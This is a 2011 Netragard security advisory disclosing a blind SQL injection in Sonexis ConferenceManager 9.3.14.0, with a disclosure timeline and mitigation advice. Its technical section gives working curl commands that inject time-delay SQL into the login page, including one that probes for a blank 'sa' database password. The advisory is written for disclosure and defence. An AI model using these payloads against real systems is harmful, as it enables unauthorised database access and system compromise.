Sonexis ConferenceManager 9.3.14.0 Blind SQL Injection

`*************************** NETRAGARD ADVISORY ************************  
http://www.netragard.com  
Research Driven Penetration Testing  
  
[POSTING NOTICE]  
--------------------------------------------------------------------------  
If you intend to post this advisory on your web page please create a  
clickable link back to the original Netragard advisory as the contents  
of the advisory may be updated. The advisory can be found on the  
Netragard website at http://www.netragard.com/  
  
For more information about Netragard visit http://www.netragard.com  
  
[Advisory Information]  
--------------------------------------------------------------------------  
Contact : Adriel T. Desautels  
Advisory ID : NETRAGARD-20110910 (Corrected)  
Researcher : Kevin Finisterre & Team  
Product Name : Sonexis ConferenceManager  
Product Version : 9.3.14.0 (Tested On)  
Vendor Name : Sonexix Technology, Inc.  
Type of Vulnerability : Blind SQL Injection   
Impact : Critical  
Date Discovered : 01/19/2011  
Vendor Notified : 01/26/2011  
  
[Notes About This Advisory]  
--------------------------------------------------------------------------  
Netragard's team discovered and exploited this vulnerability on January   
19th 2011 during the delivery of research based penetration testing services.  
Netragard notified the vendor about this vulnerability on January 26th 2011.   
Netragard did not receive any communications back from Sonexis after initial  
notification.   
  
According to an advisory published by Solutionary, Solutionary discovered  
this same vulnerability on 01/27/2011. Solutionary notified Sonexis   
of the vulnerability on 02/18/2011 and received a vendor response back on  
03/02/2011. Solutionary published a low detail advisory for this issue on  
04/06/2011.  
  
It is Netragard's policy to refrain from publishing vulnerabilities  
until after methods for remediation have been created/provided. Exceptions  
to this policy are made in the event that vendors are non-responsive or in  
the event that the vulnerability becomes public knowledge.   
  
  
[Product Description]  
--------------------------------------------------------------------------  
"The Sonexis ConferenceManager offers unbeatable value. Our high-quality   
audio platform is recognized for its ease-of-use, security, and   
cost-effectiveness — and it offers a comprehensive set of integrated Web  
conferencing capabilities. Better still, our unique architecture allows you  
unlimited flexibility. You're never more than a license key away from   
increasing users, adding Web functionality, or changing from one protocol  
to another. Simply put, it's the best thing to happen to conferencing."  
  
Taken From:  
http://www.sonexis.com/products/product_details.asp  
  
[Technical Summary]  
--------------------------------------------------------------------------  
The Sonexis ConferenceManager does not adhere to best practices as defined  
by the Open Web Application Security Project (OWASP), the de facto standard   
for Web Application Security. Specifically, the Sonexis ConferenceManager   
fails the OWASP Data Validation Criterion as well as others that are not  
discussed in this advisory.  
  
This advisory discloses details about a Blind SQL Injection vulnerability  
that was discovered by Netragard during the delivery of research driven   
penetration testing services. Successful exploitation of this  
vulnerability enables the attacker to take full control of the affected  
system. Netragard has created and will provide Proof of Concept code for  
this vulnerability shortly after the publication of this Advisory.  
  
Netragard has not received any information from the vendor since initial   
notification. As of the time of the authoring of this Advisory no official  
vendor patches have been made public. Netragard has provided methods for   
mitigation in this advisory.  
  
For more information about OWASP criterion please visit the URL Below:   
  
--> https://www.owasp.org/index.php/Category:Vulnerability <--  
  
[Technical Details]  
--------------------------------------------------------------------------  
The tests shown below can be used to determine if your Sonexis   
ConferenceManager is vulnerable.  
  
Test Environment:  
-----------------  
web server operating system: Windows 2003  
web application technology: ASP.NET, Microsoft IIS 6.0, ASP  
back-end DBMS: Microsoft SQL Server 2000  
  
  
--- TEST 1 ---  
Validated SQL command execution with the "wait+for+delay+'0:0:3'--" SQL  
command. If command execution is a success then time should return a   
"real" value of roughly 3 seconds.   
  
netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m3.281s <--- Command Execution Successful!  
user 0m0.000s  
sys 0m0.004s  
--- END TEST 1 ---  
  
  
--- TEST 2 ---  
Validated SQL command execution with the "wait+for+delay+'0:0:5'--" SQL  
command. If command execution is a success then time should return a   
"real" value of roughly 5 seconds.   
  
netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m5.277s <--- Command Execution Successful!  
user 0m0.001s  
sys 0m0.003s  
--- END TEST 2 ---  
  
  
--- TEST 3 ---  
Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL  
command. If command execution is a success then time should return a   
"real" value of roughly 10 seconds.   
  
netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m10.280s <--- Command Execution Successful!  
user 0m0.002s  
sys 0m0.004s  
--- END TEST 3 ---  
  
  
--- TEST 4 ---  
This test is an example of how to check for a blank "sa" password in the   
MsSQL Database. If the password is set then there will be no delay in  
server response. If the password is not set, then there will be a 10  
second delay.   
  
netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--"   
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m0.305s <-- Password is set (no delay).   
user 0m0.003s  
sys 0m0.001s  
  
netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--"   
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1  
  
real 0m10.101s <-- Password is not set (delay).   
user 0m0.002s  
sys 0m0.003s  
--- END TEST 4 ---  
  
[Impact]  
--------------------------------------------------------------------------  
Exploitation Difficulty : Trivial  
Risk : Complete System Compromise, Distributed   
Metastasis, Access To Sensitive Data, etc.  
  
  
[Proof Of Concept]  
--------------------------------------------------------------------------  
Netragard created a Proof of Concept exploit for this vulnerability that  
will be published on Netragard's website shortly after the release of   
this advisory.   
  
  
[Vendor Status and Chronology]  
--------------------------------------------------------------------------  
  
01/19/2011 - Vulnerability Discovered and Exploited by Netragard, LLC.  
01/26/2011 - Vendor Notified of the Vulnerability by Netragard, LLC.  
01/27/2011 - Vulnerability Discovered by Solutionary.  
02/18/2011 - Vendor Notified of the Vulnerability by Solutionary.  
03/02/2011 - Vendor Responds to Solutionary.  
04/06/2011 - Solutionary publishes a low detail advisory with no mitigation.  
04/10/2011 - Netragard publishes high detail advisory with mitigation.  
  
  
[Mitigation]  
--------------------------------------------------------------------------  
This vulnerability can be mitigated by filtering application requests with  
a Web Application Firewall.   
  
Further mitigation can be accomplished with custom filtering done through the  
Web Server configuration.   
  
Note: Mitigation does not constitute a proper fix. If an attacker is able   
to circumvent mitigation techniques then exploitation is still possible.  
An example of Web Application Firewall subversion can be found at the   
following URL: http://pentest.netragard.com/?p=10  
  
  
[Solution]  
--------------------------------------------------------------------------  
Vendor must perform a review of the Sonexis ConferenceManager source code  
and ensure that it adheres to the OWASP criterion.   
  
  
[Disclaimer]  
------------------------http://www.netragard.com--------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
  
`